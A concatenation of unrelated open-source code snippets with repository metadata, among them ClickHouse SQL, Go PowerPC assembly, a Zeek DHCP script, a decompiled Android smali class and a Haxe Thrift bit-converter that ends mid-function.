}, "2")], 'EggTwoTone'); | JavaScript | 3 | dany-freeman/material-ui | packages/mui-icons-material/lib/esm/EggTwoTone.js | [
"MIT"
] |
select hostname();
select hostName() h, count() from cluster(test_cluster_two_shards, system.one) group by h;
| SQL | 3 | pdv-ru/ClickHouse | tests/queries/0_stateless/02001_hostname_test.sql | [
"Apache-2.0"
] |
import createSvgIcon from './utils/createSvgIcon';
import { jsx as _jsx } from "react/jsx-runtime";
export default createSvgIcon( /*#__PURE__*/_jsx("path", {
d: "m9.31 17 2.44-2.44L14.19 17l1.06-1.06-2.44-2.44 2.44-2.44L14.19 10l-2.44 2.44L9.31 10l-1.06 1.06 2.44 2.44-2.44 2.44L9.31 17zM19 3h-1V1h-2v2H8V1H6v2H5c-1.11 0-1.99.9-1.99 2L3 19c0 1.1.89 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H5V8h14v11z"
}), 'EventBusy'); | JavaScript | 3 | good-gym/material-ui | packages/material-ui-icons/lib/esm/EventBusy.js | [
"MIT"
] |
At: "import-014-c.hac":17:
parse error: syntax error
parser stacks:
state value
#STATE# (imported-root-list) [7:1--8:27]
#STATE# (process-prototype) [10:1..48]
#STATE# { [11:1]
#STATE# list<(def-body-item)>: (instance-decl) ... [12:2--13:15]
#STATE# keyword: prs [16:2..4]
#STATE# (null)
#STATE# { [16:6]
#STATE# (prs-literal) [17:3..5]
#STATE# + [17:6]
in state #STATE#, possible rules are:
single_prs: prs_expr . prs_arrow prs_literal_base dir (#RULE#)
acceptable tokens are:
IMPLIES (shift)
RARROW (shift)
HASH_ARROW (shift)
| Bison | 1 | broken-wheel/hacktist | hackt_docker/hackt/test/lexer/import-014-c.stderr.bison | [
"MIT"
] |
<div class="modal error hidden" id="modal-cancel-subscription">
<!-- <button class="close"><img src="../assets/cross.svg" alt="close" title="close message"></button> -->
<h3>CANCEL SUBSCRIPTION</h3>
<p>are you sure you'd like to cancel your subscription?</p>
<b></b>
<section>
<p class="message">
<br><br>
your subscription will be cancelled immediately, and you won't be refunded for the days left on
your subscription.
<br><br>
if you're already using more storage than what the free plan provides, upon
cancellation of your subscription your account will become read-only until you clear enough space.
<br><br>
if you are using more storage than what the free plan provides, your account will be deleted after 30 days. if you have an email address on file, you will receive a notification 15 days before we take action on your account.
<br><br>
<br><br>
</p>
</section>
<progress id="unsubscribing" class="progress" value="0" max="100"></progress>
<button class="action l md white" onclick="confirmedCancelSubscription();">yes, unsubscribe!</button>
<button class="action r sm bold white cancel" onclick="hideActiveModal();">no, wait!</button>
</div> | Kit | 3 | pws1453/web-client | source/imports/app/account-modal-cancel-subscription.kit | [
"MIT"
] |
.class Landroid/support/v4/app/BackStackRecord$1;
.super Ljava/lang/Object;
.source "BackStackRecord.java"
# interfaces
.implements Landroid/support/v4/app/FragmentTransitionCompat21$ViewRetriever;
# annotations
.annotation system Ldalvik/annotation/EnclosingMethod;
value = Landroid/support/v4/app/BackStackRecord;->configureTransitions(ILandroid/support/v4/app/BackStackRecord$TransitionState;ZLandroid/util/SparseArray;Landroid/util/SparseArray;)Z
.end annotation
.annotation system Ldalvik/annotation/InnerClass;
accessFlags = 0x0
name = null
.end annotation
# instance fields
.field final synthetic this$0:Landroid/support/v4/app/BackStackRecord;
.field final synthetic val$inFragment:Landroid/support/v4/app/Fragment;
# direct methods
.method constructor <init>(Landroid/support/v4/app/BackStackRecord;Landroid/support/v4/app/Fragment;)V
.locals 0
.param p1, "this$0" # Landroid/support/v4/app/BackStackRecord;
.prologue
.line 1271
iput-object p1, p0, Landroid/support/v4/app/BackStackRecord$1;->this$0:Landroid/support/v4/app/BackStackRecord;
iput-object p2, p0, Landroid/support/v4/app/BackStackRecord$1;->val$inFragment:Landroid/support/v4/app/Fragment;
invoke-direct {p0}, Ljava/lang/Object;-><init>()V
return-void
.end method
# virtual methods
.method public getView()Landroid/view/View;
.locals 1
.prologue
.line 1274
iget-object v0, p0, Landroid/support/v4/app/BackStackRecord$1;->val$inFragment:Landroid/support/v4/app/Fragment;
invoke-virtual {v0}, Landroid/support/v4/app/Fragment;->getView()Landroid/view/View;
move-result-object v0
return-object v0
.end method
| Smali | 3 | jarekankowski/pegasus_spyware | sample3/decompiled_raw/smali/android/support/v4/app/BackStackRecord$1.smali | [
"MIT"
] |
github: [preactjs]
open_collective: preact
| YAML | 5 | webschik/preact | .github/FUNDING.yml | [
"MIT"
] |
# Copyright 2015 Reservoir Labs, Inc.
# All rights reserved.
#
# Contributed by Bob Rotsted
module TrackDHCP;
export {
global ip_to_mac: table[addr] of string &synchronized &write_expire=1day;
redef record Conn::Info += {
orig_mac: string &optional &log;
resp_mac: string &optional &log;
};
}
event DHCP::log_dhcp (rec: DHCP::Info) {
ip_to_mac[rec$assigned_ip] = rec$mac;
}
event connection_state_remove (c: connection) {
if ( c$id$orig_h in TrackDHCP::ip_to_mac )
c$conn$orig_mac = TrackDHCP::ip_to_mac[c$id$orig_h];
if ( c$id$resp_h in TrackDHCP::ip_to_mac )
c$conn$resp_mac = TrackDHCP::ip_to_mac[c$id$resp_h];
}
| Bro | 4 | reservoirlabs/bro-scripts | track-dhcp/track-dhcp.bro | [
"Apache-2.0"
] |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<PropertyGroup>
<ProductVersion>3.5</ProductVersion>
<ProjectGuid>{9d6d09c7-2c9e-4e67-abbf-8cfeaf30bade}</ProjectGuid>
<OutputType>Library</OutputType>
<Configuration Condition="'$(Configuration)' == ''">Release</Configuration>
<AllowLegacyCreate>False</AllowLegacyCreate>
<Name>com.remobjects.cardview</Name>
<RootNamespace>com.remobjects.cardview</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Debug' ">
<Optimize>false</Optimize>
<OutputPath>.\bin\Debug</OutputPath>
<DefineConstants>DEBUG;TRACE;</DefineConstants>
<GenerateDebugInfo>True</GenerateDebugInfo>
<EnableAsserts>True</EnableAsserts>
<TreatWarningsAsErrors>False</TreatWarningsAsErrors>
<CaptureConsoleOutput>False</CaptureConsoleOutput>
<StartMode>Project</StartMode>
<RegisterForComInterop>False</RegisterForComInterop>
<CpuType>anycpu</CpuType>
<RuntimeVersion>v25</RuntimeVersion>
<XmlDoc>False</XmlDoc>
<XmlDocWarningLevel>WarningOnPublicMembers</XmlDocWarningLevel>
<WarnOnCaseMismatch>True</WarnOnCaseMismatch>
<EnableUnmanagedDebugging>False</EnableUnmanagedDebugging>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Release' ">
<Optimize>true</Optimize>
<OutputPath>.\bin\Release</OutputPath>
<GenerateDebugInfo>False</GenerateDebugInfo>
<EnableAsserts>False</EnableAsserts>
<TreatWarningsAsErrors>False</TreatWarningsAsErrors>
<CaptureConsoleOutput>False</CaptureConsoleOutput>
<StartMode>Project</StartMode>
<RegisterForComInterop>False</RegisterForComInterop>
<CpuType>anycpu</CpuType>
<RuntimeVersion>v25</RuntimeVersion>
<XmlDoc>False</XmlDoc>
<XmlDocWarningLevel>WarningOnPublicMembers</XmlDocWarningLevel>
<EnableUnmanagedDebugging>False</EnableUnmanagedDebugging>
<WarnOnCaseMismatch>True</WarnOnCaseMismatch>
</PropertyGroup>
<ItemGroup>
<Folder Include="Properties\" />
<Folder Include="res\" />
<Folder Include="res\drawable-hdpi\" />
<Folder Include="res\drawable-ldpi\" />
<Folder Include="res\drawable-mdpi\" />
<Folder Include="res\drawable-xhdpi\" />
<Folder Include="res\values-v21" />
<Folder Include="res\values-v11" />
<Folder Include="res\values-sw600dp" />
<Folder Include="res\values\" />
<Folder Include="res\layout\" />
</ItemGroup>
<ItemGroup>
<AndroidResource Include="res\layout\activity_card_view.layout-xml" />
<AndroidResource Include="res\layout\cardviewfragment.layout-xml" />
<AndroidResource Include="res\values-sw600dp\template-dimens.android-xml" />
<AndroidResource Include="res\values-sw600dp\template-styles.android-xml" />
<AndroidResource Include="res\values-v11\template-styles.android-xml" />
<AndroidResource Include="res\values-v21\template-styles.android-xml" />
<AndroidResource Include="res\values\colors.android-xml" />
<AndroidResource Include="res\values\dimens.android-xml" />
<AndroidResource Include="res\values\strings.android-xml">
<SubType>Content</SubType>
</AndroidResource>
<AndroidResource Include="res\layout\main.layout-xml">
<SubType>Content</SubType>
</AndroidResource>
<AndroidResource Include="res\values\template-dimens.android-xml" />
<AndroidResource Include="res\values\template-styles.android-xml" />
<None Include="res\drawable-hdpi\icon.png">
<SubType>Content</SubType>
</None>
<None Include="res\drawable-mdpi\icon.png">
<SubType>Content</SubType>
</None>
<None Include="res\drawable-ldpi\icon.png">
<SubType>Content</SubType>
</None>
<None Include="res\drawable-xhdpi\icon.png">
<SubType>Content</SubType>
</None>
</ItemGroup>
<ItemGroup>
<AndroidManifest Include="Properties\AndroidManifest.android-xml" />
</ItemGroup>
<ItemGroup>
<Reference Include="android-support-v7-cardview.jar">
<HintPath>C:\Users\Sven\AppData\Local\Android\android-sdk\extras\android\support\v7\cardview\libs\android-support-v7-cardview.jar</HintPath>
<Private>True</Private>
</Reference>
<Reference Include="android.jar" />
<Reference Include="com.remobjects.elements.rtl.jar">
<HintPath>com.remobjects.elements.rtl.jar</HintPath>
<Private>True</Private>
</Reference>
</ItemGroup>
<ItemGroup>
<Compile Include="CardViewFragment.pas" />
<Compile Include="MainActivity.pas" />
</ItemGroup>
<ItemGroup>
<Content Include="res\drawable-hdpi\tile.9.png">
<SubType>Content</SubType>
</Content>
</ItemGroup>
<Import Project="$(MSBuildExtensionsPath)\RemObjects Software\Oxygene\RemObjects.Oxygene.Cooper.Android.targets" />
<PropertyGroup>
<PreBuildEvent />
</PropertyGroup>
</Project> | Oxygene | 1 | teamro/elements-samples | Oxygene/Java/Android/com.remobjects.CardView/com.remobjects.CardView.oxygene | [
"MIT"
] |
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="require-trusted-types-for 'script'; trusted-types *">
</head>
<body>
<webview preload="../module/isolated-ping.js" src="about:blank"/>
</body>
</html>
| HTML | 1 | lingxiao-Zhu/electron | spec/fixtures/pages/webview-trusted-types.html | [
"MIT"
] |
echo n2-$2
echo $2 >>$2.count
echo $2 >>in.countall
# we deliberately use 'redo' here instead of redo-ifchange, because this *heavily*
# stresses redo's locking when building in parallel. We end up with 100
# different targets that all not only depend on this file, but absolutely must
# acquire the lock on this file, build it atomically, and release the lock.
redo countall
| Stata | 3 | BlameJohnny/redo | t/950-curse/default.n2.do | [
"Apache-2.0"
] |
"""Constants for the flo integration."""
import logging
LOGGER = logging.getLogger(__package__)
CLIENT = "client"
DOMAIN = "flo"
FLO_HOME = "home"
FLO_AWAY = "away"
FLO_SLEEP = "sleep"
FLO_MODES = [FLO_HOME, FLO_AWAY, FLO_SLEEP]
| Python | 3 | tbarbette/core | homeassistant/components/flo/const.py | [
"Apache-2.0"
] |
{
"Version" : 0.2,
"ModuleName" : "ungif",
"Options" : {
"Debug" : false,
"Optimization" : "None",
"TargetType" : "StaticLibrary",
"TargetFileName" : "ungif",
"BuildBitDepth" : "Bits32"
},
"Configurations" : [
{
"Name" : "Debug",
"Options" : {
"Warnings" : "All",
"Debug" : true,
"FastMath" : false
}
},
{
"Name" : "Release",
"Options" : {
"Warnings" : "None",
"Optimization" : "Speed",
"FastMath" : true
}
}
],
"Files" : [
{
"Folder" : "lib",
"Files" : [
"dgif_lib.c",
"gif_err.c",
"gifalloc.c"
]
},
{
"Folder" : "headers",
"Files" : [
"lib/getarg.h",
"lib/gif_lib.h",
"lib/gif_lib_private.h"
]
}
],
"ResourcesPath" : "",
"Resources" : [
]
}
| Ecere Projects | 2 | N-eil/ecere-sdk | deps/libungif-4.1.1/libungif.epj | [
"BSD-3-Clause"
] |
# pylint: skip-file
from common.kalman.simple_kalman_impl import KF1D as KF1D
assert KF1D
| Python | 1 | Neptos/openpilot | common/kalman/simple_kalman.py | [
"MIT"
] |
// Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//go:build ppc64 || ppc64le
// +build ppc64 ppc64le
#include "go_asm.h"
#include "textflag.h"
TEXT ·IndexByte<ABIInternal>(SB),NOSPLIT|NOFRAME,$0-40
#ifndef GOEXPERIMENT_regabiargs
MOVD b_base+0(FP), R3 // R3 = byte array pointer
MOVD b_len+8(FP), R4 // R4 = length
MOVBZ c+24(FP), R5 // R5 = byte
MOVD $ret+32(FP), R14 // R14 = &ret
#else
MOVD R6, R5
#endif
BR indexbytebody<>(SB)
TEXT ·IndexByteString<ABIInternal>(SB),NOSPLIT|NOFRAME,$0-32
#ifndef GOEXPERIMENT_regabiargs
MOVD s_base+0(FP), R3 // R3 = string
MOVD s_len+8(FP), R4 // R4 = length
MOVBZ c+16(FP), R5 // R5 = byte
MOVD $ret+24(FP), R14 // R14 = &ret
#endif
BR indexbytebody<>(SB)
// R3 = addr of string
// R4 = len of string
// R5 = byte to find
// R14 = addr of return value when not regabi
TEXT indexbytebody<>(SB),NOSPLIT|NOFRAME,$0-0
MOVD R3,R17 // Save base address for calculating the index later.
RLDICR $0,R3,$60,R8 // Align address to doubleword boundary in R8.
RLDIMI $8,R5,$48,R5 // Replicating the byte across the register.
ADD R4,R3,R7 // Last acceptable address in R7.
DCBT (R8) // Prepare cache line.
RLDIMI $16,R5,$32,R5
CMPU R4,$32 // Check if it's a small string (≤32 bytes). Those will be processed differently.
MOVD $-1,R9
WORD $0x54661EB8 // Calculate padding in R6 (rlwinm r6,r3,3,26,28).
RLDIMI $32,R5,$0,R5
MOVD R7,R10 // Save last acceptable address in R10 for later.
ADD $-1,R7,R7
#ifdef GOARCH_ppc64le
SLD R6,R9,R9 // Prepare mask for Little Endian
#else
SRD R6,R9,R9 // Same for Big Endian
#endif
BLE small_string // Jump to the small string case if it's ≤32 bytes.
// If we are 64-byte aligned, branch to qw_align just to get the auxiliary values
// in V0, V1 and V10, then branch to the preloop.
ANDCC $63,R3,R11
BEQ CR0,qw_align
RLDICL $0,R3,$61,R11
MOVD 0(R8),R12 // Load one doubleword from the aligned address in R8.
CMPB R12,R5,R3 // Check for a match.
AND R9,R3,R3 // Mask bytes below s_base
RLDICL $0,R7,$61,R6 // length-1
RLDICR $0,R7,$60,R7 // Last doubleword in R7
CMPU R3,$0,CR7 // If we have a match, jump to the final computation
BNE CR7,done
ADD $8,R8,R8
ADD $-8,R4,R4
ADD R4,R11,R4
// Check for quadword alignment
ANDCC $15,R8,R11
BEQ CR0,qw_align
// Not aligned, so handle the next doubleword
MOVD 0(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR7
BNE CR7,done
ADD $8,R8,R8
ADD $-8,R4,R4
// Either quadword aligned or 64-byte at this point. We can use LVX.
qw_align:
// Set up auxiliary data for the vectorized algorithm.
VSPLTISB $0,V0 // Replicate 0 across V0
VSPLTISB $3,V10 // Use V10 as control for VBPERMQ
MTVRD R5,V1
LVSL (R0+R0),V11
VSLB V11,V10,V10
VSPLTB $7,V1,V1 // Replicate byte across V1
CMPU R4, $64 // If len ≤ 64, don't use the vectorized loop
BLE tail
// We will load 4 quardwords per iteration in the loop, so check for
// 64-byte alignment. If 64-byte aligned, then branch to the preloop.
ANDCC $63,R8,R11
BEQ CR0,preloop
// Not 64-byte aligned. Load one quadword at a time until aligned.
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6 // Check for byte in V4
BNE CR6,found_qw_align
ADD $16,R8,R8
ADD $-16,R4,R4
ANDCC $63,R8,R11
BEQ CR0,preloop
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6 // Check for byte in V4
BNE CR6,found_qw_align
ADD $16,R8,R8
ADD $-16,R4,R4
ANDCC $63,R8,R11
BEQ CR0,preloop
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6 // Check for byte in V4
BNE CR6,found_qw_align
ADD $-16,R4,R4
ADD $16,R8,R8
// 64-byte aligned. Prepare for the main loop.
preloop:
CMPU R4,$64
BLE tail // If len ≤ 64, don't use the vectorized loop
// We are now aligned to a 64-byte boundary. We will load 4 quadwords
// per loop iteration. The last doubleword is in R10, so our loop counter
// starts at (R10-R8)/64.
SUB R8,R10,R6
SRD $6,R6,R9 // Loop counter in R9
MOVD R9,CTR
ADD $-64,R8,R8 // Adjust index for loop entry
MOVD $16,R11 // Load offsets for the vector loads
MOVD $32,R9
MOVD $48,R7
// Main loop we will load 64 bytes per iteration
loop:
ADD $64,R8,R8 // Fuse addi+lvx for performance
LVX (R8+R0),V2 // Load 4 16-byte vectors
LVX (R8+R11),V3
VCMPEQUB V1,V2,V6 // Look for byte in each vector
VCMPEQUB V1,V3,V7
LVX (R8+R9),V4
LVX (R8+R7),V5
VCMPEQUB V1,V4,V8
VCMPEQUB V1,V5,V9
VOR V6,V7,V11 // Compress the result in a single vector
VOR V8,V9,V12
VOR V11,V12,V13
VCMPEQUBCC V0,V13,V14 // Check for byte
BGE CR6,found
BC 16,0,loop // bdnz loop
// Handle the tailing bytes or R4 ≤ 64
RLDICL $0,R6,$58,R4
ADD $64,R8,R8
tail:
CMPU R4,$0
BEQ notfound
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
ADD $16,R8,R8
CMPU R4,$16,CR6
BLE CR6,notfound
ADD $-16,R4,R4
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
ADD $16,R8,R8
CMPU R4,$16,CR6
BLE CR6,notfound
ADD $-16,R4,R4
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
ADD $16,R8,R8
CMPU R4,$16,CR6
BLE CR6,notfound
ADD $-16,R4,R4
LVX (R8+R0),V4
VCMPEQUBCC V1,V4,V6
BNE CR6,found_qw_align
notfound:
MOVD $-1,R3
#ifndef GOEXPERIMENT_regabiargs
MOVD R3,(R14)
#endif
RET
found:
// We will now compress the results into a single doubleword,
// so it can be moved to a GPR for the final index calculation.
// The bytes in V6-V9 are either 0x00 or 0xFF. So, permute the
// first bit of each byte into bits 48-63.
VBPERMQ V6,V10,V6
VBPERMQ V7,V10,V7
VBPERMQ V8,V10,V8
VBPERMQ V9,V10,V9
// Shift each 16-bit component into its correct position for
// merging into a single doubleword.
#ifdef GOARCH_ppc64le
VSLDOI $2,V7,V7,V7
VSLDOI $4,V8,V8,V8
VSLDOI $6,V9,V9,V9
#else
VSLDOI $6,V6,V6,V6
VSLDOI $4,V7,V7,V7
VSLDOI $2,V8,V8,V8
#endif
// Merge V6-V9 into a single doubleword and move to a GPR.
VOR V6,V7,V11
VOR V8,V9,V4
VOR V4,V11,V4
MFVRD V4,R3
#ifdef GOARCH_ppc64le
ADD $-1,R3,R11
ANDN R3,R11,R11
POPCNTD R11,R11 // Count trailing zeros (Little Endian).
#else
CNTLZD R3,R11 // Count leading zeros (Big Endian).
#endif
ADD R8,R11,R3 // Calculate byte address
return:
SUB R17,R3
#ifndef GOEXPERIMENT_regabiargs
MOVD R3,(R14)
#endif
RET
found_qw_align:
// Use the same algorithm as above. Compress the result into
// a single doubleword and move it to a GPR for the final
// calculation.
VBPERMQ V6,V10,V6
#ifdef GOARCH_ppc64le
MFVRD V6,R3
ADD $-1,R3,R11
ANDN R3,R11,R11
POPCNTD R11,R11
#else
VSLDOI $6,V6,V6,V6
MFVRD V6,R3
CNTLZD R3,R11
#endif
ADD R8,R11,R3
CMPU R11,R4
BLT return
BR notfound
done:
// At this point, R3 has 0xFF in the same position as the byte we are
// looking for in the doubleword. Use that to calculate the exact index
// of the byte.
#ifdef GOARCH_ppc64le
ADD $-1,R3,R11
ANDN R3,R11,R11
POPCNTD R11,R11 // Count trailing zeros (Little Endian).
#else
CNTLZD R3,R11 // Count leading zeros (Big Endian).
#endif
CMPU R8,R7 // Check if we are at the last doubleword.
SRD $3,R11 // Convert trailing zeros to bytes.
ADD R11,R8,R3
CMPU R11,R6,CR7 // If at the last doubleword, check the byte offset.
BNE return
BLE CR7,return
BR notfound
small_string:
// We unroll this loop for better performance.
CMPU R4,$0 // Check for length=0
BEQ notfound
MOVD 0(R8),R12 // Load one doubleword from the aligned address in R8.
CMPB R12,R5,R3 // Check for a match.
AND R9,R3,R3 // Mask bytes below s_base.
CMPU R3,$0,CR7 // If we have a match, jump to the final computation.
RLDICL $0,R7,$61,R6 // length-1
RLDICR $0,R7,$60,R7 // Last doubleword in R7.
CMPU R8,R7
BNE CR7,done
BEQ notfound // Hit length.
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
CMPU R8,R7
BNE CR6,done
BEQ notfound
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
CMPU R8,R7
BNE CR6,done
BEQ notfound
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
CMPU R8,R7
BNE CR6,done
BEQ notfound
MOVDU 8(R8),R12
CMPB R12,R5,R3
CMPU R3,$0,CR6
BNE CR6,done
BR notfound
| GAS | 5 | rleungx/go | src/internal/bytealg/indexbyte_ppc64x.s | [
"BSD-3-Clause"
] |
public class Test : GLib.Object {
construct {
stdout.printf("Test from main directory\n");
}
}
| Vala | 3 | kira78/meson | test cases/vala/22 same target in directories/Test.vala | [
"Apache-2.0"
] |
// name: flute.ck
// desc: demo of Faust chugin in action!
// instantiate and connect faust => ck
Faust flute => dac;
// evaluate Faust code
flute.eval(`
process = pm.flute_ui_MIDI <: _,_;
`);
// dump parameters
flute.dump();
// time loop
while( true )
{
flute.v("/flute/gate",1); // start note
flute.v("/flute/midi/freq", Math.random2f(100,800) ); // assign pitch
300::ms => now; // "sustain"
flute.v("/flute/gate",0); // end note
100::ms => now; // give it some time to "breath"
}
| ChucK | 4 | ccdarabundit/chugins | Faust/examples/flute.ck | [
"MIT"
] |
very foo is new Bar with a, b, c
| Dogescript | 0 | erinkeith/dogescript | test/spec/var/new/multi-args-comma/source.djs | [
"MIT"
] |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.thrift.helper;
import haxe.Int64;
import haxe.io.Bytes;
import haxe.io.BytesBuffer;
class BitConverter {
public static function DoubleToInt64Bits( db : Float) : Int64 {
var buf = new BytesBuffer();
buf.addDouble( db);
return bytesToLong( buf.getBytes());
}
public static function Int64BitsToDouble( i64 : Int64) : Float {
var buf = new BytesBuffer();
buf.add( fixedLongToBytes( i64));
return buf.getBytes().getDouble(0);
}
/**
* Convert a long into little-endian bytes in buf starting at off and going
* until off+7.
*/
public static function fixedLongToBytes( n : Int64) : Bytes {
var buf = Bytes.alloc(8);
#if( haxe_ver < 3.2)
buf.set( 0, Int64.getLow( Int64.and( n, Int64.make(0, 0xff))));
buf.set( 1, Int64.getLow( Int64.and( Int64.shr( n, 8), Int64.make(0, 0xff))));
buf.set( 2, Int64.getLow( Int64.and( Int64.shr( n, 16), Int64.make(0, 0xff))));
buf.set( 3, Int64.getLow( Int64.and( Int64.shr( n, 24), Int64.make(0, 0xff))));
buf.set( 4, Int64.getLow( Int64.and( Int64.shr( n, 32), Int64.make(0, 0xff))));
buf.set( 5, Int64.getLow( Int64.and( Int64.shr( n, 40), Int64.make(0, 0xff))));
buf.set( 6, Int64.getLow( Int64.and( Int64.shr( n, 48), Int64.make(0, 0xff))));
buf.set( 7, Int64.getLow( Int64.and( Int64.shr( n, 56), Int64.make(0, 0xff))));
#else
buf.set( 0, Int64.and( n, Int64.make(0, 0xff)).low);
buf.set( 1, Int64.and( Int64.shr( n, 8), Int64.make(0, 0xff)).low);
buf.set( 2, Int64.and( Int64.shr( n, 16), Int64.make(0, 0xff)).low);
buf.set( 3, Int64.and( Int64.shr( n, 24), Int64.make(0, 0xff)).low);
buf.set( 4, Int64.and( Int64.shr( n, 32), Int64.make(0, 0xff)).low);
buf.set( 5, Int64.and( Int64.shr( n, 40), Int64.make(0, 0xff)).low);
buf.set( 6, Int64.and( Int64.shr( n, 48), Int64.make(0, 0xff)).low);
buf.set( 7, Int64.and( Int64.shr( n, 56), Int64.make(0, 0xff)).low);
#end
return buf;
}
/**
* Note that it's important that the mask bytes are long literals,
* otherwise they'll default to ints, and when you shift an int left 56 bits,
* you just get a messed up int.
*/
public static function bytesToLong( bytes : Bytes) : Int64 {
var result : Int64 = Int64.make(0, 0);
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(7)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(6)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(5)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(4)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(3)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(2)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(1)));
result = Int64.or( Int64.shl( result, 8), Int64.make( 0, bytes.get(0)));
return result;
}
#if debug
private static function TestBTL( test : Int64) : Void {
var buf : Bytes = fixedLongToBytes( test);
var erg = bytesToLong(buf);
if ( Int64.compare( erg, test) != 0)
throw 'BitConverter.bytesToLongTest($test) failed: $erg';
}
#end
#if debug
private static function TestPair( a : Float, b : Int64) : Void {
var bx = DoubleToInt64Bits(a);
if ( Int64.compare( bx, b) != 0)
throw 'BitConverter.TestPair: DoubleToInt64Bits($a): expected $b, got $bx';
var ax = Int64BitsToDouble(b);
if( ax != a)
throw 'BitConverter.TestPair: Int64BitsToDouble($b: expected $a, got $ax';
}
#end
#if debug
public static function UnitTest() : Void {
// bytesToLong()
var i : Int;
TestBTL( Int64.make(0,0));
for ( i in 0 ... 62) {
TestBTL( Int64.shl( Int64.make(0,1), i));
TestBTL( Int64.sub( Int64.make(0,0), Int64.shl( Int64.make(0,1), i)));
}
TestBTL( Int64.make(0x7FFFFFFF,0xFFFFFFFF));
TestBTL( Int64.make(cast(0x80000000,Int),0x00000000));
// DoubleToInt64Bits;
TestPair( 1.0000000000000000E+000, Int64.make(cast(0x3FF00000,Int),cast(0x00000000,Int)));
TestPair( 1.5000000000000000E+001, Int64.make(cast(0x402E0000,Int),cast(0x00000000,Int)));
TestPair( 2.5500000000000000E+002, Int64.make(cast(0x406FE000,Int),cast(0x00000000,Int)));
TestPair( 4.2949672950000000E+009, Int64.make(cast(0x41EFFFFF,Int),cast(0xFFE00000,Int)));
TestPair( 3.9062500000000000E-003, Int64.make(cast(0x3F700000,Int),cast(0x00000000,Int)));
TestPair( 2.3283064365386963E-010, Int64.make(cast(0x3DF00000,Int),cast(0x00000000,Int)));
TestPair( 1.2345678901230000E-300, Int64.make(cast(0x01AA74FE,Int),cast(0x1C1E7E45,Int)));
TestPair( 1.2345678901234500E-150, Int64.make(cast(0x20D02A36,Int),cast(0x586DB4BB,Int)));
TestPair( 1.2345678901234565E+000, Int64.make(cast(0x3FF3C0CA,Int),cast(0x428C59FA,Int)));
TestPair( 1.2345678901234567E+000, Int64.make(cast(0x3FF3C0CA,Int),cast(0x428C59FB,Int)));
TestPair( 1.2345678901234569E+000, Int64.make(cast(0x3FF3C0CA,Int),cast(0x428C59FC,Int)));
TestPair( 1.2345678901234569E+150, Int64.make(cast(0x5F182344,Int),cast(0xCD3CDF9F,Int)));
TestPair( 1.2345678901234569E+300, Int64.make(cast(0x7E3D7EE8,Int),cast(0xBCBBD352,Int)));
TestPair( -1.7976931348623157E+308, Int64.make(cast(0xFFEFFFFF,Int),cast(0xFFFFFFFF,Int)));
TestPair( 1.7976931348623157E+308, Int64.make(cast(0x7FEFFFFF,Int),cast(0xFFFFFFFF,Int)));
TestPair( 4.9406564584124654E-324, Int64.make(cast(0x00000000,Int),cast(0x00000001,Int)));
TestPair( 0.0000000000000000E+000, Int64.make(cast(0x00000000,Int),cast(0x00000000,Int)));
TestPair( 4.94065645841247E-324, Int64.make(cast(0x00000000,Int),cast(0x00000001,Int)));
TestPair( 3.2378592100206092E-319, Int64.make(cast(0x00000000,Int),cast(0x0000FFFF,Int)));
TestPair( 1.3906711615669959E-309, Int64.make(cast(0x0000FFFF,Int),cast(0xFFFFFFFF,Int)));
TestPair( Math.NEGATIVE_INFINITY, Int64.make(cast(0xFFF00000,Int),cast(0x00000000,Int)));
TestPair( Math.POSITIVE_INFINITY, Int64.make(cast(0x7FF00000,Int),cast(0x00000000,Int)));
// NaN is special
var i64nan = DoubleToInt64Bits( Math.NaN);
var i64cmp = Int64.make(cast(0xFFF80000, Int), cast(0x00000000, Int));
if ( ! Math.isNaN( Int64BitsToDouble( i64cmp)))
throw 'BitConverter NaN-Test #1: expected NaN';
// For doubles, a quiet NaN is a bit pattern
// between 7FF8000000000000 and 7FFFFFFFFFFFFFFF
// or FFF8000000000000 and FFFFFFFFFFFFFFFF
var min1 = Int64.make( cast(0x7FF80000, Int), cast(0x00000000, Int));
var max1 = Int64.make( cast(0x7FFFFFFF, Int), cast(0xFFFFFFFF, Int));
var min2 = Int64.make( cast(0xFFF80000, Int), cast(0x00000000, Int));
var max2 = Int64.make( cast(0xFFFFFFFF, Int), cast(0xFFFFFFFF, Int));
var ok1 = (Int64.compare( min1, i64nan) <= 0) && (Int64.compare( i64nan, max1) <= 0);
